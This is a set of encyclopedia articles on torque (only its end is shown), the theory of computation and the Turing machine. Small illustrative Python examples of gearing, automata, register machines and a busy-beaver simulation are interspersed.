Internal-combustion engines produce useful torque only over a limited range of rotational speeds (typically from around 1,000–6,000 rpm for a small car). One can measure the varying torque output over that range with a dynamometer and show it as a torque curve. Steam engines and electric motors tend to produce maximum torque close to zero rpm, with the torque diminishing as rotational speed rises (due to increasing friction and other constraints). Reciprocating steam engines and electric motors can start heavy loads from zero rpm without a clutch. In practice, the relationship between power and torque can be observed in bicycles. Bicycles are typically composed of two road wheels, front and rear gears (referred to as sprockets) meshing with a chain, and a derailleur mechanism if the bicycle's transmission system allows multiple gear ratios to be used (i.e. a multi-speed bicycle), all of which are attached to the frame. A cyclist, the person who rides the bicycle, provides the input power by turning the pedals, thereby cranking the front sprocket (commonly referred to as the chainring). The input power provided by the cyclist is equal to the product of angular speed (i.e. the number of pedal revolutions per minute times 2π) and the torque at the spindle of the bicycle's crankset. The bicycle's drivetrain transmits the input power to the road wheel, which in turn conveys the received power to the road as the output power of the bicycle. Depending on the gear ratio of the bicycle, a (torque, angular speed) input pair is converted to a (torque, angular speed) output pair. By using a larger rear gear, or by switching to a lower gear in multi-speed bicycles, angular speed of the road wheels is decreased while the torque is increased, the product of which (i.e. power) does not change.
Torque multiplier
Torque can be multiplied via three methods: by locating the fulcrum such that the length of a lever is increased; by using a longer lever; or by the use of a speed-reducing gearset or gear box. Such a mechanism multiplies torque, as rotation rate is reduced.
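As a sketch of the bicycle gearing arithmetic described above (the function and the tooth counts are illustrative assumptions, ignoring drivetrain losses):

```python
def rear_wheel_output(torque_in_nm: float, cadence_rpm: float,
                      chainring_teeth: int, rear_cog_teeth: int):
    """Torque and speed at the rear cog for a given pedal input.

    A lower gear (larger rear cog) multiplies torque and divides
    angular speed; the transmitted power is unchanged.
    """
    ratio = rear_cog_teeth / chainring_teeth
    return torque_in_nm * ratio, cadence_rpm / ratio

# Example: 40 N*m at 90 rpm through a 50-tooth chainring, 25-tooth cog.
torque_out, speed_out = rear_wheel_output(40, 90, 50, 25)
print(torque_out, speed_out)   # 20.0 N*m at 180.0 rpm -- same power
```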
Physical sciences
Classical mechanics
null
30402
https://en.wikipedia.org/wiki/Theory%20of%20computation
Theory of computation
In theoretical computer science and mathematics, the theory of computation is the branch that deals with which problems can be solved on a model of computation using an algorithm, how efficiently they can be solved, and to what degree (e.g., approximate solutions versus precise ones). The field is divided into three major branches: automata theory and formal languages, computability theory, and computational complexity theory, which are linked by the question: "What are the fundamental capabilities and limitations of computers?". In order to perform a rigorous study of computation, computer scientists work with a mathematical abstraction of computers called a model of computation. There are several models in use, but the most commonly examined is the Turing machine. Computer scientists study the Turing machine because it is simple to formulate, can be analyzed and used to prove results, and because it represents what many consider the most powerful possible "reasonable" model of computation (see Church–Turing thesis). It might seem that the potentially infinite memory capacity is an unrealizable attribute, but any decidable problem solved by a Turing machine will always require only a finite amount of memory. So in principle, any problem that can be solved (decided) by a Turing machine can be solved by a computer that has a finite amount of memory.

History
The theory of computation can be considered the creation of models of all kinds in the field of computer science; it therefore draws on mathematics and logic. In the last century, it separated from mathematics and became an independent academic discipline with its own conferences, such as FOCS in 1960 and STOC in 1969, and its own awards, such as the IMU Abacus Medal (established in 1981 as the Rolf Nevanlinna Prize), the Gödel Prize, established in 1993, and the Knuth Prize, established in 1996. Some pioneers of the theory of computation were Ramon Llull, Alonzo Church, Kurt Gödel, Alan Turing, Stephen Kleene, Rózsa Péter, John von Neumann and Claude Shannon.

Branches

Automata theory
Automata theory is the study of abstract machines (or more appropriately, abstract 'mathematical' machines or systems) and the computational problems that can be solved using these machines. These abstract machines are called automata. The word automata comes from the Greek word Αυτόματα, which means that something is doing something by itself. Automata theory is also closely related to formal language theory, as automata are often classified by the class of formal languages they are able to recognize (a minimal automaton is sketched in code below). An automaton can be a finite representation of a formal language that may be an infinite set. Automata are used as theoretical models for computing machines, and are used for proofs about computability.

Formal language theory
Language theory is a branch of mathematics concerned with describing languages as a set of operations over an alphabet. It is closely linked with automata theory, as automata are used to generate and recognize formal languages. There are several classes of formal languages, each allowing more complex language specification than the one before it (the Chomsky hierarchy), and each corresponding to a class of automata which recognizes it. Because automata are used as models for computation, formal languages are the preferred mode of specification for any problem that must be computed.
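As an illustration of the automata-language correspondence described above, here is a minimal sketch (our own example, not from the article): a deterministic finite automaton accepting the regular language of binary strings that contain an even number of 1s.

```python
def accepts(s: str) -> bool:
    """DFA with two states; 'even' is both the start and the only accepting state."""
    state = "even"
    transitions = {
        ("even", "0"): "even", ("even", "1"): "odd",
        ("odd", "0"): "odd",   ("odd", "1"): "even",
    }
    for symbol in s:
        state = transitions[(state, symbol)]
    return state == "even"

print(accepts("1011"))  # False: three 1s
print(accepts("1001"))  # True: two 1s
```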
Computability theory
Computability theory deals primarily with the question of the extent to which a problem is solvable on a computer. The statement that the halting problem cannot be solved by a Turing machine is one of the most important results in computability theory, as it is an example of a concrete problem that is both easy to formulate and impossible to solve using a Turing machine. Much of computability theory builds on the halting problem result. Another important step in computability theory was Rice's theorem, which states that for all non-trivial properties of partial functions, it is undecidable whether a Turing machine computes a partial function with that property. Computability theory is closely related to the branch of mathematical logic called recursion theory, which removes the restriction of studying only models of computation which are reducible to the Turing model. Many mathematicians and computational theorists who study recursion theory refer to it as computability theory.

Computational complexity theory
Complexity theory considers not only whether a problem can be solved at all on a computer, but also how efficiently the problem can be solved. Two major aspects are considered: time complexity and space complexity, which are respectively how many steps it takes to perform a computation, and how much memory is required to perform that computation. In order to analyze how much time and space a given algorithm requires, computer scientists express the time or space required to solve the problem as a function of the size of the input problem. For example, finding a particular number in a long list of numbers becomes harder as the list of numbers grows larger. If we say there are n numbers in the list, then if the list is not sorted or indexed in any way we may have to look at every number in order to find the number we're seeking. We thus say that in order to solve this problem, the computer needs to perform a number of steps that grows linearly in the size of the problem. To simplify this problem, computer scientists have adopted Big O notation, which allows functions to be compared in a way that ensures that particular aspects of a machine's construction do not need to be considered, but rather only the asymptotic behavior as problems become large. So in our previous example, we might say that the problem requires O(n) steps to solve. Perhaps the most important open problem in all of computer science is the question of whether a certain broad class of problems denoted NP can be solved efficiently. This is discussed further at Complexity classes P and NP, and the P versus NP problem is one of the seven Millennium Prize Problems stated by the Clay Mathematics Institute in 2000. The Official Problem Description was given by Turing Award winner Stephen Cook.
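As a concrete rendering of the linear-search example above, the following sketch (illustrative, not from the article) performs O(n) work in the worst case:

```python
def linear_search(numbers, target):
    """Find target in an unsorted list: up to n comparisons, hence O(n)."""
    for i, value in enumerate(numbers):
        if value == target:
            return i
    return -1  # not found after examining all n entries

# Doubling the list size roughly doubles the worst-case work.
print(linear_search([7, 3, 9, 1], 9))  # 2
```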
Models of computation
Aside from the Turing machine, other equivalent (see Church–Turing thesis) models of computation are in use.

Lambda calculus
A computation consists of an initial lambda expression (or two if you want to separate the function and its input) plus a finite sequence of lambda terms, each deduced from the preceding term by one application of beta reduction. Combinatory logic is a concept which has many similarities to λ-calculus, but important differences also exist (e.g. the fixed point combinator Y has a normal form in combinatory logic but not in λ-calculus). Combinatory logic was developed with great ambitions: understanding the nature of paradoxes, making the foundations of mathematics more economical (conceptually), and eliminating the notion of variables (thus clarifying their role in mathematics).

μ-recursive functions
A computation consists of a μ-recursive function, i.e. its defining sequence, any input value(s), and a sequence of recursive functions appearing in the defining sequence with inputs and outputs. Thus, if in the defining sequence of a recursive function f the functions g and h appear, then terms of the form 'g(5)=7' or 'h(3,2)=10' might appear. Each entry in this sequence needs to be an application of a basic function or follow from the entries above by using composition, primitive recursion or μ-recursion. For instance if f(x) = h(x, g(x)), then for 'f(5)=3' to appear, terms like 'g(5)=6' and 'h(5,6)=3' must occur above. The computation terminates only if the final term gives the value of the recursive function applied to the inputs.

Markov algorithm
A string rewriting system that uses grammar-like rules to operate on strings of symbols.

Register machine
A theoretically interesting idealization of a computer (a minimal sketch in code appears below). There are several variants. In most of them, each register can hold a natural number (of unlimited size), and the instructions are simple (and few in number), e.g. only decrementation (combined with conditional jump) and incrementation exist (and halting). The lack of an infinite (or dynamically growing) external store (seen in Turing machines) can be understood by replacing its role with Gödel numbering techniques: the fact that each register holds a natural number allows the possibility of representing a complicated thing (e.g. a sequence, or a matrix, etc.) by an appropriately huge natural number — unambiguity of both representation and interpretation can be established by the number-theoretical foundations of these techniques.

In addition to the general computational models, some simpler computational models are useful for special, restricted applications. Regular expressions, for example, specify string patterns in many contexts, from office productivity software to programming languages. Finite automata, another formalism mathematically equivalent to regular expressions, are used in circuit design and in some kinds of problem-solving. Context-free grammars specify programming language syntax. Non-deterministic pushdown automata are another formalism equivalent to context-free grammars. Primitive recursive functions are a defined subclass of the recursive functions. Different models of computation have the ability to do different tasks. One way to measure the power of a computational model is to study the class of formal languages that the model can generate; in this way the Chomsky hierarchy of languages is obtained.
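Returning to the register machine entry above, the following is a speculative sketch of such a machine with only increment, decrement-with-jump-on-zero, and halt; the instruction encoding is our assumption, not a standard one.

```python
def run(program, registers):
    """program: list of ('INC', r, next) or ('DECJZ', r, next, jump_if_zero)
    tuples; execution starts at instruction 0 and halts when pc becomes None."""
    pc = 0
    while pc is not None:
        instr = program[pc]
        if instr[0] == "INC":
            _, r, pc = instr
            registers[r] += 1
        else:  # DECJZ: decrement, or jump if the register is already zero
            _, r, nxt, jz = instr
            if registers[r] == 0:
                pc = jz
            else:
                registers[r] -= 1
                pc = nxt
    return registers

# Add register 1 into register 0 by looping while register 1 is non-zero.
prog = [("DECJZ", 1, 1, None), ("INC", 0, 0)]
print(run(prog, {0: 2, 1: 3}))  # {0: 5, 1: 0}
```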
Mathematics
Discrete mathematics
null
30403
https://en.wikipedia.org/wiki/Turing%20machine
Turing machine
A Turing machine is a mathematical model of computation describing an abstract machine that manipulates symbols on a strip of tape according to a table of rules. Despite the model's simplicity, it is capable of implementing any computer algorithm. The machine operates on an infinite memory tape divided into discrete cells, each of which can hold a single symbol drawn from a finite set of symbols called the alphabet of the machine. It has a "head" that, at any point in the machine's operation, is positioned over one of these cells, and a "state" selected from a finite set of states. At each step of its operation, the head reads the symbol in its cell. Then, based on the symbol and the machine's own present state, the machine writes a symbol into the same cell, and moves the head one step to the left or the right, or halts the computation. The choice of which replacement symbol to write, which direction to move the head, and whether to halt is based on a finite table that specifies what to do for each combination of the current state and the symbol that is read. As with a real computer program, it is possible for a Turing machine to go into an infinite loop which will never halt. The Turing machine was invented in 1936 by Alan Turing, who called it an "a-machine" (automatic machine). It was Turing's doctoral advisor, Alonzo Church, who later coined the term "Turing machine" in a review. With this model, Turing was able to answer two questions in the negative: Does a machine exist that can determine whether any arbitrary machine on its tape is "circular" (e.g., freezes, or fails to continue its computational task)? Does a machine exist that can determine whether any arbitrary machine on its tape ever prints a given symbol? Thus by providing a mathematical description of a very simple device capable of arbitrary computations, he was able to prove properties of computation in general—and in particular, the uncomputability of the Entscheidungsproblem, or 'decision problem' (whether every mathematical statement is provable or disprovable). Turing machines proved the existence of fundamental limitations on the power of mechanical computation. While they can express arbitrary computations, their minimalist design makes them too slow for computation in practice: real-world computers are based on different designs that, unlike Turing machines, use random-access memory. Turing completeness is the ability for a computational model or a system of instructions to simulate a Turing machine. A programming language that is Turing complete is theoretically capable of expressing all tasks accomplishable by computers; nearly all programming languages are Turing complete if the limitations of finite memory are ignored. Overview A Turing machine is an idealised model of a central processing unit (CPU) that controls all data manipulation done by a computer, with the canonical machine using sequential memory to store data. Typically, the sequential memory is represented as a tape of infinite length on which the machine can perform read and write operations. In the context of formal language theory, a Turing machine (automaton) is capable of enumerating some arbitrary subset of valid strings of an alphabet. A set of strings which can be enumerated in this manner is called a recursively enumerable language. The Turing machine can equivalently be defined as a model that recognises valid input strings, rather than enumerating output strings. 
Given a Turing machine M and an arbitrary string s, it is generally not possible to decide whether M will eventually produce s. This is due to the fact that the halting problem is unsolvable, which has major implications for the theoretical limits of computing. The Turing machine is capable of processing an unrestricted grammar, which further implies that it is capable of robustly evaluating first-order logic in an infinite number of ways. This is famously demonstrated through lambda calculus. A Turing machine that is able to simulate any other Turing machine is called a universal Turing machine (UTM, or simply a universal machine). Another mathematical formalism, lambda calculus, with a similar "universal" nature was introduced by Alonzo Church. Church's work intertwined with Turing's to form the basis for the Church–Turing thesis. This thesis states that Turing machines, lambda calculus, and other similar formalisms of computation do indeed capture the informal notion of effective methods in logic and mathematics and thus provide a model through which one can reason about an algorithm or "mechanical procedure" in a mathematically precise way without being tied to any particular formalism. Studying the abstract properties of Turing machines has yielded many insights into computer science, computability theory, and complexity theory. Physical description In his 1948 essay, "Intelligent Machinery", Turing wrote that his machine consists of: Description The Turing machine mathematically models a machine that mechanically operates on a tape. On this tape are symbols, which the machine can read and write, one at a time, using a tape head. Operation is fully determined by a finite set of elementary instructions such as "in state 42, if the symbol seen is 0, write a 1; if the symbol seen is 1, change into state 17; in state 17, if the symbol seen is 0, write a 1 and change to state 6;" etc. In the original article ("On Computable Numbers, with an Application to the Entscheidungsproblem", see also references below), Turing imagines not a mechanism, but a person whom he calls the "computer", who executes these deterministic mechanical rules slavishly (or as Turing puts it, "in a desultory manner"). More explicitly, a Turing machine consists of: A tape divided into cells, one next to the other. Each cell contains a symbol from some finite alphabet. The alphabet contains a special blank symbol (here written as '0') and one or more other symbols. The tape is assumed to be arbitrarily extendable to the left and to the right, so that the Turing machine is always supplied with as much tape as it needs for its computation. Cells that have not been written before are assumed to be filled with the blank symbol. In some models the tape has a left end marked with a special symbol; the tape extends or is indefinitely extensible to the right. A head that can read and write symbols on the tape and move the tape left and right one (and only one) cell at a time. In some models the head moves and the tape is stationary. A state register that stores the state of the Turing machine, one of finitely many. Among these is the special start state with which the state register is initialised. These states, writes Turing, replace the "state of mind" a person performing computations would ordinarily be in. 
A finite table of instructions that, given the state (qi) the machine is currently in and the symbol (aj) it is reading on the tape (the symbol currently under the head), tells the machine to do the following in sequence (for the 5-tuple models): Either erase or write a symbol (replacing aj with aj1). Move the head (which is described by dk and can have values: 'L' for one step left, or 'R' for one step right, or 'N' for staying in the same place). Assume the same or a new state as prescribed (go to state qi1). In the 4-tuple models, erasing or writing a symbol (aj1) and moving the head left or right (dk) are specified as separate instructions. The table tells the machine to (ia) erase or write a symbol or (ib) move the head left or right, and then (ii) assume the same or a new state as prescribed, but not both actions (ia) and (ib) in the same instruction. In some models, if there is no entry in the table for the current combination of symbol and state, then the machine will halt; other models require all entries to be filled. Every part of the machine (i.e. its state, symbol-collections, and used tape at any given time) and its actions (such as printing, erasing and tape motion) is finite, discrete and distinguishable; it is the unlimited amount of tape and runtime that gives it an unbounded amount of storage space.

Formal definition
Following Hopcroft & Ullman (1979), a (one-tape) Turing machine can be formally defined as a 7-tuple M = ⟨Q, Γ, b, Σ, δ, q0, F⟩ where
Γ is a finite, non-empty set of tape alphabet symbols;
b ∈ Γ is the blank symbol (the only symbol allowed to occur on the tape infinitely often at any step during the computation);
Σ ⊆ Γ ∖ {b} is the set of input symbols, that is, the set of symbols allowed to appear in the initial tape contents;
Q is a finite, non-empty set of states;
q0 ∈ Q is the initial state;
F ⊆ Q is the set of final states or accepting states. The initial tape contents is said to be accepted by M if it eventually halts in a state from F.
δ : (Q ∖ F) × Γ → Q × Γ × {L, R} is a partial function called the transition function, where L is left shift, R is right shift. If δ is not defined on the current state and the current tape symbol, then the machine halts; intuitively, the transition function specifies the next state transited from the current state, which symbol to overwrite the current symbol pointed by the head, and the next head movement. A variant allows "no shift", say N, as a third element of the set of directions {L, R}.
The 7-tuple for the 3-state busy beaver looks like this (see more about this busy beaver at Turing machine examples):
Q = {A, B, C, HALT} (states);
Γ = {0, 1} (tape alphabet symbols);
b = 0 (blank symbol);
Σ = {1} (input symbols);
q0 = A (initial state);
F = {HALT} (final states);
δ = see the state table below (transition function).
Initially all tape cells are marked with 0.
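The formal definition can be exercised directly in code. The following is a hedged sketch (the dictionary encoding of δ is our own choice) that runs the 3-state busy beaver whose 7-tuple is given above; the delta dictionary reproduces its standard transition table.

```python
from collections import defaultdict

def run_tm(delta, state, halt_states, max_steps=100):
    tape = defaultdict(int)  # blank symbol b = 0 on an unbounded tape
    head = 0
    while state not in halt_states and max_steps > 0:
        write, move, state = delta[(state, tape[head])]
        tape[head] = write
        head += 1 if move == "R" else -1
        max_steps -= 1
    return tape

# delta: (state, scanned symbol) -> (symbol to write, head move, next state)
delta = {
    ("A", 0): (1, "R", "B"), ("A", 1): (1, "L", "C"),
    ("B", 0): (1, "L", "A"), ("B", 1): (1, "R", "B"),
    ("C", 0): (1, "L", "B"), ("C", 1): (1, "R", "HALT"),
}
tape = run_tm(delta, "A", {"HALT"})
print(sum(tape.values()))  # 6: the 3-state busy beaver halts leaving six 1s
```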
Additional details required to visualise or implement Turing machines
In the words of van Emde Boas (1990), p. 6: "The set-theoretical object [his formal seven-tuple description similar to the above] provides only partial information on how the machine will behave and what its computations will look like." For instance: There will need to be many decisions on what the symbols actually look like, and a failproof way of reading and writing symbols indefinitely. The shift left and shift right operations may shift the tape head across the tape, but when actually building a Turing machine it is more practical to make the tape slide back and forth under the head instead. The tape can be finite, and automatically extended with blanks as needed (which is closest to the mathematical definition), but it is more common to think of it as stretching infinitely at one or both ends and being pre-filled with blanks except on the explicitly given finite fragment the tape head is on (this is, of course, not implementable in practice). The tape cannot be fixed in length, since that would not correspond to the given definition and would seriously limit the range of computations the machine can perform to those of a linear bounded automaton if the tape was proportional to the input size, or to those of a finite-state machine if it was strictly fixed-length.

Alternative definitions
Definitions in literature sometimes differ slightly, to make arguments or proofs easier or clearer, but this is always done in such a way that the resulting machine has the same computational power. For example, the set {L, R} could be changed to {L, R, N}, where N ("None" or "No-operation") would allow the machine to stay on the same tape cell instead of moving left or right. This would not increase the machine's computational power. The most common convention represents each "Turing instruction" in a "Turing table" by one of nine 5-tuples, per the convention of Turing/Davis (Turing (1936) in The Undecidable, pp. 126–127 and Davis (2000) p. 152):
(definition 1): (qi, Sj, Sk/E/N, L/R/N, qm) (current state qi, symbol scanned Sj, print symbol Sk/erase E/none N, move_tape_one_square left L/right R/none N, new state qm).
Other authors (Minsky (1967) p. 119, Hopcroft and Ullman (1979) p. 158, Stone (1972) p. 9) adopt a different convention, with the new state qm listed immediately after the scanned symbol Sj:
(definition 2): (qi, Sj, qm, Sk/E/N, L/R/N) (current state qi, symbol scanned Sj, new state qm, print symbol Sk/erase E/none N, move_tape_one_square left L/right R/none N).
For the remainder of this article "definition 1" (the Turing/Davis convention) will be used. In the following table, Turing's original model allowed only the first three lines, which he called N1, N2, N3 (cf. Turing in The Undecidable, p. 126). He allowed for erasure of the "scanned square" by naming a 0th symbol S0 = "erase" or "blank", etc. However, he did not allow for non-printing, so every instruction-line includes "print symbol Sk" or "erase" (cf. footnote 12 in Post (1947), The Undecidable, p. 300). The abbreviations are Turing's (The Undecidable, p. 119). Subsequent to Turing's original paper in 1936–1937, machine-models have allowed all nine possible types of five-tuples. Any Turing table (list of instructions) can be constructed from the above nine 5-tuples. For technical reasons, the three non-printing or "N" instructions (4, 5, 6) can usually be dispensed with. For examples see Turing machine examples. Less frequently, the use of 4-tuples is encountered: these represent a further atomization of the Turing instructions (cf. Post (1947), Boolos & Jeffrey (1974, 1999), Davis-Sigal-Weyuker (1994)); also see more at Post–Turing machine.

The "state"
The word "state" used in the context of Turing machines can be a source of confusion, as it can mean two things. Most commentators after Turing have used "state" to mean the name/designator of the current instruction to be performed—i.e. the contents of the state register. But Turing (1936) made a strong distinction between a record of what he called the machine's "m-configuration", and the machine's (or person's) "state of progress" through the computation—the current state of the total system.
What Turing called "the state formula" includes both the current instruction and all the symbols on the tape: Earlier in his paper Turing carried this even further: he gives an example where he placed a symbol of the current "m-configuration"—the instruction's label—beneath the scanned square, together with all the symbols on the tape (The Undecidable, p. 121); this he calls "the complete configuration" (The Undecidable, p. 118). To print the "complete configuration" on one line, he places the state-label/m-configuration to the left of the scanned symbol. A variant of this is seen in Kleene (1952) where Kleene shows how to write the Gödel number of a machine's "situation": he places the "m-configuration" symbol q4 over the scanned square in roughly the center of the 6 non-blank squares on the tape (see the Turing-tape figure in this article) and puts it to the right of the scanned square. But Kleene refers to "q4" itself as "the machine state" (Kleene, p. 374–375). Hopcroft and Ullman call this composite the "instantaneous description" and follow the Turing convention of putting the "current state" (instruction-label, m-configuration) to the left of the scanned symbol (p. 149), that is, the instantaneous description is the composite of non-blank symbols to the left, state of the machine, the current symbol scanned by the head, and the non-blank symbols to the right. Example: total state of 3-state 2-symbol busy beaver after 3 "moves" (taken from example "run" in the figure below): 1A1 This means: after three moves the tape has ... 000110000 ... on it, the head is scanning the right-most 1, and the state is A. Blanks (in this case represented by "0"s) can be part of the total state as shown here: B01; the tape has a single 1 on it, but the head is scanning the 0 ("blank") to its left and the state is B. "State" in the context of Turing machines should be clarified as to which is being described: the current instruction, or the list of symbols on the tape together with the current instruction, or the list of symbols on the tape together with the current instruction placed to the left of the scanned symbol or to the right of the scanned symbol. Turing's biographer Andrew Hodges (1983: 107) has noted and discussed this confusion. "State" diagrams To the right: the above table as expressed as a "state transition" diagram. Usually large tables are better left as tables (Booth, p. 74). They are more readily simulated by computer in tabular form (Booth, p. 74). However, certain concepts—e.g. machines with "reset" states and machines with repeating patterns (cf. Hill and Peterson p. 244ff)—can be more readily seen when viewed as a drawing. Whether a drawing represents an improvement on its table must be decided by the reader for the particular context. The reader should again be cautioned that such diagrams represent a snapshot of their table frozen in time, not the course ("trajectory") of a computation through time and space. While every time the busy beaver machine "runs" it will always follow the same state-trajectory, this is not true for the "copy" machine that can be provided with variable input "parameters". The diagram "progress of the computation" shows the three-state busy beaver's "state" (instruction) progress through its computation from start to finish. On the far right is the Turing "complete configuration" (Kleene "situation", Hopcroft–Ullman "instantaneous description") at each step. 
If the machine were to be stopped and cleared to blank both the "state register" and the entire tape, these "configurations" could be used to rekindle a computation anywhere in its progress (cf. Turing (1936) The Undecidable, pp. 139–140).

Equivalent models
Many machines that might be thought to have more computational capability than a simple universal Turing machine can be shown to have no more power (Hopcroft and Ullman p. 159, cf. Minsky (1967)). They might compute faster, perhaps, or use less memory, or their instruction set might be smaller, but they cannot compute more powerfully (i.e. more mathematical functions). (The Church–Turing thesis hypothesises this to be true for any kind of machine: that anything that can be "computed" can be computed by some Turing machine.) A Turing machine is equivalent to a single-stack pushdown automaton (PDA) that has been made more flexible and concise by relaxing the last-in-first-out (LIFO) requirement of its stack. In addition, a Turing machine is also equivalent to a two-stack PDA with standard LIFO semantics, by using one stack to model the tape left of the head and the other stack for the tape to the right (a sketch of this tape-as-two-stacks representation appears at the end of this section). At the other extreme, some very simple models turn out to be Turing-equivalent, i.e. to have the same computational power as the Turing machine model. Common equivalent models are the multi-tape Turing machine, the multi-track Turing machine, machines with input and output, and the non-deterministic Turing machine (NDTM), as opposed to the deterministic Turing machine (DTM), for which the action table has at most one entry for each combination of symbol and state. Read-only, right-moving Turing machines are equivalent to DFAs (as well as NFAs, by conversion using the NFA to DFA conversion algorithm). For practical and didactic purposes, the equivalent register machine can be used as a usual assembly programming language. A relevant question is whether or not the computation model represented by concrete programming languages is Turing equivalent. While the computation of a real computer is based on finite states and is thus not capable of simulating a Turing machine, programming languages themselves do not necessarily have this limitation. Kirner et al. (2009) have shown that among the general-purpose programming languages some are Turing complete while others are not. For example, ANSI C is not Turing complete, as all instantiations of ANSI C (different instantiations are possible as the standard deliberately leaves certain behaviour undefined for legacy reasons) imply a finite-space memory. This is because the size of memory-reference data types, called pointers, is accessible inside the language. However, other programming languages like Pascal do not have this feature, which allows them to be Turing complete in principle. They are Turing complete in principle only, since memory allocation in a programming language is allowed to fail, which means the programming language can be Turing complete when ignoring failed memory allocations, but the compiled programs executable on a real computer cannot.
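As promised above, here is an illustrative sketch (our construction, not from the article) of the two-stack representation of a Turing machine's tape: one stack holds the cells to the left of the head, while the top of the other stack is the scanned cell.

```python
class TwoStackTape:
    """A Turing-machine tape simulated by two LIFO stacks."""
    def __init__(self, blank=0):
        self.left, self.right, self.blank = [], [], blank

    def read(self):
        return self.right[-1] if self.right else self.blank

    def write(self, symbol):
        if self.right:
            self.right[-1] = symbol
        else:
            self.right.append(symbol)

    def move_right(self):  # push the scanned cell onto the left stack
        self.left.append(self.right.pop() if self.right else self.blank)

    def move_left(self):   # pop from the left stack back under the head
        self.right.append(self.left.pop() if self.left else self.blank)

tape = TwoStackTape()
tape.write(1); tape.move_right(); tape.write(1); tape.move_left()
print(tape.read())  # 1: the head is back over the first written cell
```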
He "suppose[s] that the choices are always between two possibilities 0 and 1. Each proof will then be determined by a sequence of choices i1, i2, ..., in (i1 = 0 or 1, i2 = 0 or 1, ..., in = 0 or 1), and hence the number 2n + i12n-1 + i22n-2 + ... +in completely determines the proof. The automatic machine carries out successively proof 1, proof 2, proof 3, ..." (Footnote ‡, The Undecidable, p. 138) This is indeed the technique by which a deterministic (i.e., a-) Turing machine can be used to mimic the action of a nondeterministic Turing machine; Turing solved the matter in a footnote and appears to dismiss it from further consideration. An oracle machine or o-machine is a Turing a-machine that pauses its computation at state "o" while, to complete its calculation, it "awaits the decision" of "the oracle"—an entity unspecified by Turing "apart from saying that it cannot be a machine" (Turing (1939), The Undecidable, p. 166–168). Universal Turing machines As Turing wrote in The Undecidable, p. 128 (italics added): This finding is now taken for granted, but at the time (1936) it was considered astonishing. The model of computation that Turing called his "universal machine"—"U" for short—is considered by some (cf. Davis (2000)) to have been the fundamental theoretical breakthrough that led to the notion of the stored-program computer. In terms of computational complexity, a multi-tape universal Turing machine need only be slower by logarithmic factor compared to the machines it simulates. This result was obtained in 1966 by F. C. Hennie and R. E. Stearns. (Arora and Barak, 2009, theorem 1.9) Comparison with real machines Turing machines are more powerful than some other kinds of automata, such as finite-state machines and pushdown automata. According to the Church–Turing thesis, they are as powerful as real machines, and are able to execute any operation that a real program can. What is neglected in this statement is that, because a real machine can only have a finite number of configurations, it is nothing but a finite-state machine, whereas a Turing machine has an unlimited amount of storage space available for its computations. There are a number of ways to explain why Turing machines are useful models of real computers: Anything a real computer can compute, a Turing machine can also compute. For example: "A Turing machine can simulate any type of subroutine found in programming languages, including recursive procedures and any of the known parameter-passing mechanisms" (Hopcroft and Ullman p. 157). A large enough FSA can also model any real computer, disregarding IO. Thus, a statement about the limitations of Turing machines will also apply to real computers. The difference lies only with the ability of a Turing machine to manipulate an unbounded amount of data. However, given a finite amount of time, a Turing machine (like a real machine) can only manipulate a finite amount of data. Like a Turing machine, a real machine can have its storage space enlarged as needed, by acquiring more disks or other storage media. Descriptions of real machine programs using simpler abstract models are often much more complex than descriptions using Turing machines. For example, a Turing machine describing an algorithm may have a few hundred states, while the equivalent deterministic finite automaton (DFA) on a given real machine has quadrillions. This makes the DFA representation infeasible to analyze. Turing machines describe algorithms independent of how much memory they use. 
There is a limit to the memory possessed by any current machine, but this limit can rise arbitrarily in time. Turing machines allow us to make statements about algorithms which will (theoretically) hold forever, regardless of advances in conventional computing machine architecture. Algorithms running on Turing-equivalent abstract machines can have arbitrary-precision data types available and never have to deal with unexpected conditions (including, but not limited to, running out of memory).

Limitations

Computational complexity theory
A limitation of Turing machines is that they do not model the strengths of a particular arrangement well. For instance, modern stored-program computers are actually instances of a more specific form of abstract machine known as the random-access stored-program machine or RASP machine model. Like the universal Turing machine, the RASP stores its "program" in "memory" external to its finite-state machine's "instructions". Unlike the universal Turing machine, the RASP has an infinite number of distinguishable, numbered but unbounded "registers"—memory "cells" that can contain any integer (cf. Elgot and Robinson (1964), Hartmanis (1971), and in particular Cook and Reckhow (1973); references at random-access machine). The RASP's finite-state machine is equipped with the capability for indirect addressing (e.g., the contents of one register can be used as an address to specify another register); thus the RASP's "program" can address any register in the register-sequence. The upshot of this distinction is that there are computational optimizations that can be performed based on the memory indices, which are not possible in a general Turing machine; thus when Turing machines are used as the basis for bounding running times, a "false lower bound" can be proven on certain algorithms' running times (due to the false simplifying assumption of a Turing machine). An example of this is binary search, an algorithm that can be shown to perform more quickly when using the RASP model of computation rather than the Turing machine model.

Interaction
In the early days of computing, computer use was typically limited to batch processing, i.e., non-interactive tasks, each producing output data from given input data. Computability theory, which studies computability of functions from inputs to outputs, and for which Turing machines were invented, reflects this practice. Since the 1970s, interactive use of computers became much more common. In principle, it is possible to model this by having an external agent read from the tape and write to it at the same time as a Turing machine, but this rarely matches how interaction actually happens; therefore, when describing interactivity, alternatives such as I/O automata are usually preferred.

Comparison with the arithmetic model of computation
The arithmetic model of computation differs from the Turing model in two aspects: In the arithmetic model, every real number requires a single memory cell, whereas in the Turing model the storage size of a real number depends on the number of bits required to represent it. In the arithmetic model, every basic arithmetic operation on real numbers (addition, subtraction, multiplication and division) can be done in a single step, whereas in the Turing model the run-time of each arithmetic operation depends on the length of the operands. Some algorithms run in polynomial time in one model but not in the other. For example: The Euclidean algorithm runs in polynomial time in the Turing model, but not in the arithmetic model. The algorithm that reads n numbers and then computes 2^(2^n) by repeated squaring runs in polynomial time in the arithmetic model, but not in the Turing model. This is because the number of bits required to represent the outcome is exponential in the input size (see the sketch below). However, if an algorithm runs in polynomial time in the arithmetic model, and in addition, the binary length of all involved numbers is polynomial in the length of the input, then it is always polynomial-time in the Turing model. Such an algorithm is said to run in strongly polynomial time.
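A short sketch (illustrative, our own) makes the bit-growth concrete:

```python
def repeated_square(n):
    """n squarings (n arithmetic-model steps) yield 2**(2**n)."""
    x = 2
    for _ in range(n):
        x = x * x
    return x

for n in range(1, 6):
    # The bit length of the result grows exponentially in n,
    # so the Turing-model cost of the arithmetic explodes: 3, 5, 9, 17, 33 bits.
    print(n, repeated_square(n).bit_length())
```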
History

Historical background: computational machinery
